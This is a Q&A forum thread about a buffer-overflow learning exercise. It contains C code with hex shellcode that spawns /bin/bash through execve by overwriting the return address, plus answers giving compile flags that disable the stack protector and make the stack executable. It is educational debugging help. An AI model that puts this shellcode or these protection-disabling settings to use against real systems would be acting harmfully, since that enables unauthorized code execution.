1

I'm trying to learn about buffer overflows on my Ubuntu 12.04 32 bit machine by following along with the videos at http://www.securitytube.net/groups?operation=view&groupId=4 . Currently, I'm on part 5, which injects some relocatable code to generate a bash shell via ExecVe

I can get the Shellcode.c to build just fine, using gcc -mpreferred-stack-boundary=2 -o Shellcode Shellcode.c as it shows in the part 5 video. However, when I run the C code, all I get is Segmentation Fault (core dumped). I do not get a bash shell spawned like it shows in the video.

Can anyone tell me why I'm not spawning a bash shell like the demo shows? My gut is telling me that this is because I am using a later version kernel (no idea what is used in the demo).

Thanks!

code follows:

Shellcode.c

#include<stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"
                   "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e"
                   "\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62"
                   "\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";


int main(){

        int *ret;

        ret = (int *)&ret +2;

        (*ret) = (int)shellcode;

}
Vojtech Vrbka
  • 5,342
  • 6
  • 44
  • 63
thechico
  • 21
  • 4
  • There are two main possibilities: either your shell code is incorrect, or you didn't overwrite the return address on the stack correctly. You need to know what the shell code does (or is supposed to do). Maybe the address of `execv` is in it — but the address has changed on your machine. – Jonathan Leffler Feb 12 '15 at 15:46
  • Put a 0xcc byte at the beginning and run it in gdb. If it doesn't cause a breakpoint, it means you aren't even *starting* the shellcode. 0xcc is the interrupt 3 instruction (trap to debugger) and is very useful when writing exploits and/or shellcode – adam Jul 01 '17 at 14:01
  • Also note it's possible that your BSS section isn't executable and is set rw- only. Upon execution, you would get a '''SIGSEGV''' for that as well – adam Jul 01 '17 at 14:03

1 Answers1

1

My friend, make sure you compile it correctly.

If it is 32bits shellcode, which is very likely becasue \xcd\x80 is there.

And make sure the stack is executable and no stack protector is there

gcc -m32 -o a shell.code -fno-stack-protector -z execstack ./a

This should give you a shell if your shellcode is right.

If not run gdb a to step through which part is wrong.

Timothy Leung
  • 1,407
  • 7
  • 22
  • 39